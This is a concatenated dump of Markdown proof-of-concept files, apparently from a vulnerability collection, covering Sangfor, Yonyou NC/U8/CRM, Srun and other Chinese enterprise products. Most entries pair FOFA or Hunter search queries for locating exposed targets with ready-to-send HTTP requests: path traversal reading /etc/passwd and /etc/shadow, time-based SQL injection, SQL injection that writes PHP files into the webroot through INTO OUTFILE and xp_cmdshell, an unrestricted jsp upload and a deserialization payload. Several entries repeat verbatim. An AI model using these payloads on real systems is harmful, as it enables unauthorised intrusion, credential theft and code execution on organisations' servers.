/wpoc/深信服/深信服SG上网优化管理系统-catjs.php-任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 深信服SG上网优化管理系统 catjs.php 任意文件读取漏洞
2 | ```
3 | POST /php/catjs.php
4 |
5 | [" ../../../../../../etc/shadow"]
6 | ```
7 |
--------------------------------------------------------------------------------
/wpoc/深信服/深信服下一代防火墙NGAF任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 深信服下一代防火墙NGAF任意文件读取漏洞
2 |
3 | ## fofa:
4 |
5 | "Redirect.php?url=/LogInOut.php" && port="85"
6 |
7 | ## hunter:
8 | web.body="LogInOut.php?type=logout"
9 |
10 | ## 漏洞复现
11 | ```
12 | curl --insecure https://:85/svpn_html/loadfile.php?file=/etc/./passwd -H "y-forwarded-for: 127.0.0.1"
13 |
14 | ```
15 |
16 | 
17 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/wpoc/深澜计费管理系统/深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750).md:
--------------------------------------------------------------------------------
1 | # 深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750)
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | "/js/lib/slimscroll.js"
9 | ```
10 |
11 | ## poc
12 |
13 | ```python
14 | POST /strategy/ip/bind-ip HTTP/2
15 | Host:
16 | Content-Type: application/x-www-form-urlencoded
17 |
18 | data1=O%3A33%3A%22setasign%5CFpdi%5CPdfReader%5CPdfReader%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00parser%22%3BO%3A20%3A%22yii%5Credis%5CConnection%22%3A12%3A%7B
19 | ```
20 |
21 |
--------------------------------------------------------------------------------
/wpoc/深澜计费管理系统/深澜计费管理系统proxy存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 深澜计费管理系统proxy存在任意文件读取漏洞
2 |
3 | 杭州瀚洋科技有限公司(深澜软件)是全球领先且企业高端用户最多的认证计费技术厂商之一,总部位于中国的杭州。目前全球超过2500家企业选择深澜软件作为其用户认证管理及计费方案;其中在中国Top100高校中有60%使用我们的产品。 作为全球认证计费解决方案的领导品牌
4 |
5 | ## fofa
6 |
7 | ```
8 | "/js/lib/slimscroll.js"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | /demo/proxy?url=file:///etc/passwd
15 | ```
16 |
17 | 
--------------------------------------------------------------------------------
/wpoc/满客宝智慧食堂系统/满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md:
--------------------------------------------------------------------------------
1 | # 满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926)
2 |
3 |
4 |
5 | ## poc
6 |
7 | ```java
8 | GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=a&ossKey=/../../../../../../../../../../../etc/passwd HTTP/1.1
9 | Host:
10 | ```
11 |
12 |
--------------------------------------------------------------------------------
/wpoc/瑞友天翼应用虚拟化系统/瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞
2 |
3 | ## hunter
4 | ```
5 | app.name="REALOR 瑞友天翼虚拟化平台"
6 | ```
7 |
8 | ## poc
9 | ```
10 | http://xx.xx.xx.xx/hmrao.php?s=/Admin/appsave&appid=1%27);select%200x3c3f70687020706870696e666f28293b3f3e%20into%20outfile%20%27C:\Program%20Files%20(x86)\RealFriend\Rap%20Server\WebRoot\123.php%27%20--+
11 |
12 | http://xx.xx.xx.xx/hmrao.php?s=/Admin/appdel&list=1111111%27%29%29%20AND%20%28SELECT%206312%20FROM%20%28SELECT%28SLEEP%285%29%29%29coHe%29%23
13 | ```
14 |
15 | ## 漏洞来源
16 | - https://mp.weixin.qq.com/s/-TliLqPaokAqcE_qj5OPVQ
17 |
--------------------------------------------------------------------------------
/wpoc/瑞斯康达/瑞斯康达main.asp未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 | # 瑞斯康达main.asp未授权访问漏洞
2 |
3 | 瑞斯康达 wireless main.asp 存在未授权访问漏洞。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | banner="Server: INP httpd" || header="Server: INP httpd"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | GET /main.asp HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Ge cko/20100101 Firefox/56.0
17 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
18 | Cookie: sessionid=admin
19 | Accept-Encoding: gzip, deflate
20 | X-Requested-With: XMLHttpRequest
21 | ```
22 |
23 | 
--------------------------------------------------------------------------------
/wpoc/用友OA/某友时空KSOA PayBill SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 某友时空KSOA PayBill SQL注入漏洞
2 | ```
3 | POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
4 | Host: 1.1.1.1
5 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 | Content-Length: 134
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 |
10 | 11'WAITFOR DELAY '00:00:03';-1102360
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/用友OA/某友时空KSOA-PayBill-SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 某友时空KSOA PayBill SQL注入漏洞
2 | ```
3 | POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
4 | Host: 1.1.1.1
5 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 | Content-Length: 134
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 |
10 | 11'WAITFOR DELAY '00:00:03';-1102360
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友 GRP U8 license_check.jsp 存在SQL注入.md:
--------------------------------------------------------------------------------
1 |
2 | ## 用友 GRP U8 license_check.jsp 存在SQL注入
3 |
4 | ## sql注入payload
5 | ```
6 | ';WAITFOR DELAY '0:0:5'-- q
7 | ```
8 |
9 | ## poc
10 | ```
11 |
12 | GET /u8qx/license_check.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
13 | Host:
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
15 | Connection: close
16 | ```
17 |
18 | 
19 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞
2 |
3 | ## fofa-qeury
4 | app="yonyou-GRP-U8"
5 |
6 | ## POC
7 | ```
8 | POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
9 | Host:
10 | Connection: close
11 | Content-Type: application/x-www-form-urlencoded
12 | Content-Length: 53
13 |
14 | userName=';WAITFOR DELAY '0:0:5'--&ysnd=&historyFlag=
15 | ```
16 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友-GRP-U8-bx_historyDataCheck.jsp-SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞
2 |
3 | ## fofa-qeury
4 | app="yonyou-GRP-U8"
5 |
6 | ## POC
7 | ```
8 | POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
9 | Host:
10 | Connection: close
11 | Content-Type: application/x-www-form-urlencoded
12 | Content-Length: 53
13 |
14 | userName=';WAITFOR DELAY '0:0:5'--&ysnd=&historyFlag=
15 | ```
16 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友-GRP-U8-license_check.jsp-存在SQL注入.md:
--------------------------------------------------------------------------------
1 |
2 | ## 用友 GRP U8 license_check.jsp 存在SQL注入
3 |
4 | ## sql注入payload
5 | ```
6 | ';WAITFOR DELAY '0:0:5'-- q
7 | ```
8 |
9 | ## poc
10 | ```
11 |
12 | GET /u8qx/license_check.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
13 | Host:
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
15 | Connection: close
16 | ```
17 |
18 | 
19 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友CRM 任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友CRM 任意文件读取漏洞
2 |
3 | ## hunter
4 | ```
5 | app.name="用友 CRM"
6 | ```
7 |
8 | ## poc
9 | ```
10 | http://127.0.0.1:9000/pub/help2.php?key=../../apache/php.ini
11 | ```
12 | 
13 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友CRM-任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友CRM 任意文件读取漏洞
2 |
3 | ## hunter
4 | ```
5 | app.name="用友 CRM"
6 | ```
7 |
8 | ## poc
9 | ```
10 | http://127.0.0.1:9000/pub/help2.php?key=../../apache/php.ini
11 | ```
12 | 
13 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞
2 |
3 | 用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager,产品分B、C、G三个产品系列,以上受到本次通报漏洞的影响。用友GRP-U8 SelectDMJE.jsp 存在SQL注入漏洞。
4 |
5 | ## fofa
6 | ```
7 | app="用友-GRP-U8"
8 | ```
9 |
10 | ## poc
11 | ```
12 | GET /u8qx/SelectDMJE.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
13 | Host: your-ip
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
15 | Connection: close
16 | ```
17 |
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友GRP-U8-listSelectDialogServlet存在SQL注入.md:
--------------------------------------------------------------------------------
1 | ## 用友GRP-U8-listSelectDialogServlet存在SQL注入
2 |
3 | ## poc
4 | ```
5 | GET /listSelectDialogServlet?slType=slFZX&slCdtn=1=2;waitfor%20delay%20%270:0:3%27 HTTP/1.1
6 | Cache-Control: max-age=0
7 | Origin: null
8 | DNT: 1
9 | Upgrade-Insecure-Requests: 1
10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
11 | Accept-Encoding: gzip, deflate
12 | Accept-Language: zh-CN,zh;q=0.9
13 | Connection: close
14 | SOAPAction:
15 | Host: 172.16.135.132:8009
16 |
17 | ```
18 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友GRP-U8-obr_zdybxd_check.jsp存在SQL注入.md:
--------------------------------------------------------------------------------
1 | ## 用友GRP-U8-obr_zdybxd_check.jsp存在SQL注入
2 |
3 | ## poc
4 | ```
5 | GET /u8qx/obr_zdybxd_check.jsp?mlid=1';waitfor+delay+'0:0:3'-- HTTP/1.1
6 | Host: 172.16.135.132:8009
7 | Cache-Control: max-age=0
8 | Origin: null
9 | DNT: 1
10 | Upgrade-Insecure-Requests: 1
11 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
12 | Accept-Encoding: gzip, deflate
13 | Accept-Language: zh-CN,zh;q=0.9
14 | Connection: close
15 | ```
16 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友GRPA++Cloud政府财务云存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友GRPA++Cloud政府财务云存在任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | body="/pf/portal/login/css/fonts/style.css"
6 | ```
7 |
8 |
9 | ## poc
10 | ```
11 | GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
12 | Host:
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
14 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
15 | Accept-Encoding: gzip, deflate, br
16 | Accept-Language: zh-CN,zh;q=0.9
17 | Connection: close
18 | ```
19 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友NC word.docx任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 |
2 | ## 用友NC word.docx任意文件读取漏洞
3 |
4 | ## fofa
5 | ```
6 | body="UClient.dmg"
7 | ```
8 |
9 | ## poc
10 | ```
11 | GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
12 | Host: 127.0.0.1
13 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
14 | Accept: */*
15 | Connection: Keep-Alive
16 |
17 | ```
18 |
19 | ## 漏洞复现
20 | 
21 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友NC-ActionServlet存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友NC-ActionServlet存在SQL注入漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.FormulaViewAction&method=execute&repID=1')%20WAITFOR%20DELAY%20'0:0:5'--+&unitID=public HTTP/1.1
7 | Host:
8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 | SOAPAction: http://tempuri.org/GetHomeInfo
10 | Accept-Encoding: identity
11 | Accept: */*
12 | Connection: keep-alive
13 | ```
14 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友NC-Cloud文件服务器用户登陆绕过漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友NC-Cloud文件服务器用户登陆绕过漏洞
2 |
3 | 用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。用友NC-Cloud文件服务器存在一个权限绕过漏洞。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="用友-NC-Cloud"
9 | ```
10 |
11 | ## poc
12 |
13 | 访问/fs/出现如下页面,代表漏洞存在
14 |
15 | 
16 |
17 | 输入任意用户名+密码登录,将登入时的数据进行抓包拦截其响应包,并将false值,修改成true放行即可成功绕过登录认证。
18 |
19 | 
--------------------------------------------------------------------------------
/wpoc/用友OA/用友NC-bill存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友NC-bill存在SQL注入漏洞
2 |
3 | 用友NC /portal/pt/erfile/down/bill存在SQL注入漏洞,未经身份验证的攻击者可通过该漏洞获取数据库敏感信息。
4 |
5 | ## fofa
6 | ```
7 | icon_hash="1085941792" && body="/logo/images/logo.gif"
8 | ```
9 |
10 |
11 | ## poc
12 | ```
13 | GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
14 | Host:
15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
16 | Content-Type: application/x-www-form-urlencoded
17 | Accept-Encoding: gzip, deflate
18 | Accept: */*
19 | Connection: keep-alive
20 |
21 | ```
22 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友NC-downTax存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友NC-downTax存在SQL注入漏洞
2 |
3 | NC65系统可利用/portal/pt/downTax/download接口中的classid参数进行sql注入,从而窃取服务器的敏感信息。
4 |
5 | ## fofa
6 |
7 | ```
8 | app="用友-UFIDA-NC"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
17 | Content-Type: application/x-www-form-urlencoded
18 | Accept-Encoding: gzip, deflate
19 | Accept: */*
20 | Connection: keep-alive
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友NC-word.docx任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 |
2 | ## 用友NC word.docx任意文件读取漏洞
3 |
4 | ## fofa
5 | ```
6 | body="UClient.dmg"
7 | ```
8 |
9 | ## poc
10 | ```
11 | GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
12 | Host: 127.0.0.1
13 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
14 | Accept: */*
15 | Connection: Keep-Alive
16 |
17 | ```
18 |
19 | ## 漏洞复现
20 | 
21 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友NC-workflowImageServlet接口存在sql注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友NC-workflowImageServlet接口存在sql注入漏洞
2 |
3 | ## fofa
4 | ```
5 | icon_hash="1085941792"
6 | ```
7 |
8 | ## poc
9 | ```
10 | GET /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1
11 | Host: 192.168.63.129:8088
12 | Content-Type: application/x-www-form-urlencoded
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
14 | Content-Length: 19
15 | ```
16 |
17 | 
18 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友NCCloud系统runScript存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友NCCloud系统runScript存在SQL注入漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | POST /ncchr/attendScript/internal/runScript HTTP/1.1
7 | Host:
8 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
9 | Content-Length: 59
10 | Accept: */*
11 | Accept-Encoding: gzip
12 | Accept-Language: en
13 | Authorization: 58e00466213416018d01d15de83b0198
14 | Connection: close
15 | Content-Type: application/x-www-form-urlencoded
16 |
17 | key=1&script=select 1,111*111,USER,4,5,6,7,8,9,10 from dual
18 | ```
19 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友NC_grouptemplet文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友NC_grouptemplet文件上传漏洞
2 |
3 |
4 | ## fofa
5 | ```
6 | title="YONYOU NC"
7 | ```
8 |
9 |
10 | ## poc
11 | ```
12 | POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp&maxSize=999 HTTP/1.1
13 | Host:
14 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ
15 | User-Agent: Mozilla/5.0
16 |
17 | ------WebKitFormBoundaryEXmnamw5gVZG9KAQ
18 | Content-Disposition: form-data; name="file"; filename="test.jsp"
19 | Content-Type: application/octet-stream
20 |
21 | 111111111111111111111
22 | ------WebKitFormBoundaryEXmnamw5gVZG9KAQ--
23 | ```
24 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友NC接口PaWfm存在sql注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友NC接口PaWfm存在sql注入漏洞
2 |
3 | ## fofa
4 | ```
5 | icon_hash="1085941792"
6 | app="用友-UFIDA-NC"
7 | ```
8 |
9 | ## poc
10 | ```
11 | GET /portal/pt/PaWfm/open?pageId=login&proDefPk=11';waitfor+delay+'0:0:6'-- HTTP/1.1
12 | Host: 192.168.63.129:8088
13 | Content-Type: application/x-www-form-urlencoded
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
15 | Content-Length: 19
16 | ```
17 |
18 | 
19 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友NC接口download存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友NC接口download存在SQL注入漏洞
2 |
3 |
4 | ## fofa
5 |
6 | ```yaml
7 | app="用友-UFIDA-NC"
8 | ```
9 |
10 | ## poc
11 |
12 | ```java
13 | http://ip/portal/pt/psnImage/download?pageId=login&pk_psndoc=1%27)%20AND%206322=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(79)||CHR(66)||CHR(101),5)%20AND%20(%27rASZ%27=%27rASZ
14 | ```
15 |
16 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友NC系统printBill接口存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友NC系统printBill接口存在任意文件读取漏洞
2 |
3 | `注意:这个漏洞在读取文件的时候,会将原来的文件删除,谨慎使用。`
4 |
5 | ## poc
6 | ```
7 | GET /portal/pt/printpdf/printBill?pageId=login&filePath=../../startup.bat HTTP/1.1
8 | Host: 192.168.63.129:8088
9 | User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
10 | Content-Type: application/x-www-form-urlencoded
11 | Content-Length: 68
12 |
13 | ```
14 |
15 | 
16 |
17 |
18 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友NC系统接口link存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友NC系统接口link存在SQL注入漏洞
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="用友-UFIDA-NC"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | GET /portal/pt/link/content?pageId=login&pk_funnode=1';waitfor%20delay%20'0:0:0'--&pk_menuitem=2&pageModule=3&pageName=4 HTTP/1.1
15 | Host: xx.xx.xx.xx
16 | Accept-Encoding: identity
17 | Accept-Language: zh-CN,zh;q=0.8
18 | Accept: */*
19 | User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
20 | Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
21 | Connection: keep-alive
22 | Referer: http://www.baidu.com
23 | Cache-Control: max-age=0
24 | ```
25 |
26 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8 Cloud-ArchiveVerify存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友U8 Cloud-ArchiveVerify存在SQL注入漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | POST /u8cuapws/rest/archive/verify HTTP/1.1
7 | Host: your-ip
8 | User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 | Content-Type: application/x-www-form-urlencoded
10 |
11 | {"orgInfo":{"code":"1';WAITFOR DELAY '0:0:5'--"}}
12 | ```
13 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8 Cloud-KeyWordReportQuery存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友U8 Cloud-KeyWordReportQuery存在SQL注入漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | POST /service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery HTTP/1.1
7 | Host:
8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
9 | Content-Type: application/x-www-form-urlencoded
10 | Content-Length: 0
11 |
12 | {"reportType":"1';waitfor delay '0:0:3'-- ","pageInfo":{"currentPageIndex":1,"pageSize":1},"keyword":[]}
13 | ```
14 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8-CRM接口rellistname.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友U8-CRM接口rellistname.php存在SQL注入漏洞
2 |
3 | 用友U8+CRM /config/rellistname.php 文件多个方法存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | body="用友U8CRM" || body="/js/tfunction.js" || title="用友U8CRM"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | GET /config/rellistname.php?DontCheckLogin=1&objType=1&reportID=1+wAiTFOR+DeLAy'0:0:4'--+- HTTP/1.1
15 | Host:
16 | Cookie: PHPSESSID=bgsesstimeout-;
17 | ```
18 |
19 | 
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8-CRM系统接口attrlist存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友U8-CRM系统接口attrlist存在SQL注入漏洞
2 |
3 |
4 |
5 | ## hunter
6 |
7 | ```yaml
8 | app.name="用友 CRM"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | POST /devtools/tools/attrlist.php?DontCheckLogin=1&isquery=1 HTTP/1.1
15 | Host:
16 | Connection: close
17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
18 | Content-Type: application/x-www-form-urlencoded;
19 |
20 | obj_type=1';WAITFOR DELAY '0:0:5'--
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8-CRM系统接口eventseteventsetlist.php存在SQL注入.md:
--------------------------------------------------------------------------------
1 | # 用友U8-CRM系统接口eventseteventsetlist.php存在SQL注入
2 |
3 | 用友U8-CRM系统接口eventseteventsetlist.php存在SQL注入,未经身份验证的攻击者通过漏洞执行任意SQL语句。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | body="用友U8CRM" || body="/js/tfunction.js" || title="用友U8CRM"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | GET /eventset/eventsetlist.php?DontCheckLogin=1&action=stop&stopFlag=1&eventID=1;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
15 | Host:
16 | Cookie: PHPSESSID=bgsesstimeout-;
17 | ```
18 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞
2 |
3 | 用友U8-CRM系统接口 /bgt/reservationcomplete.php 存在SQL注入漏洞
4 |
5 | ## hunter
6 |
7 | ```yaml
8 | app.name="用友 CRM"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20echo%20hello;?^%3E%20%3E%20D:\U8SOFT\turbocrm70\code\www\hello.php%27; HTTP/1.1
15 | Host:
16 | ```
17 |
18 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8-Cloud-ArchiveVerify存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友U8 Cloud-ArchiveVerify存在SQL注入漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | POST /u8cuapws/rest/archive/verify HTTP/1.1
7 | Host: your-ip
8 | User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 | Content-Type: application/x-www-form-urlencoded
10 |
11 | {"orgInfo":{"code":"1';WAITFOR DELAY '0:0:5'--"}}
12 | ```
13 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8-Cloud-KeyWordReportQuery存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友U8 Cloud-KeyWordReportQuery存在SQL注入漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | POST /service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery HTTP/1.1
7 | Host:
8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
9 | Content-Type: application/x-www-form-urlencoded
10 | Content-Length: 0
11 |
12 | {"reportType":"1';waitfor delay '0:0:3'-- ","pageInfo":{"currentPageIndex":1,"pageSize":1},"keyword":[]}
13 | ```
14 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友U8-Cloud接口FileServlet存在任意文件读取漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | GET /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== HTTP/1.1
7 | Host: url
8 |
9 | ```
10 |
--------------------------------------------------------------------------------
/wpoc/用友OA/用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
